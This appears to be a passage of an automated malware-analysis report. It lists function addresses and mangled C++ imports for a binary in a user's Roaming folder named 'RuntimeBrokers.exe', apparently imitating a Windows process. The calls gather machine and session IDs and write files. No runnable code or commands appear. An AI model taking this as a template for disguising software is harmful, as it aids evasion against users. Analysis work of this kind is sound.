Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C10AC3B __EH_prolog3_GS,_time32,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBEHXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBE_KXZ,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,_wfopen,fwrite,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno,fclose,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno, 1_2_6C10AC3B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6C9C ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z, 1_2_6C0C6C9C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6D1E ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z, 1_2_6C0C6D1E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C1365DE ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z, 1_2_6C1365DE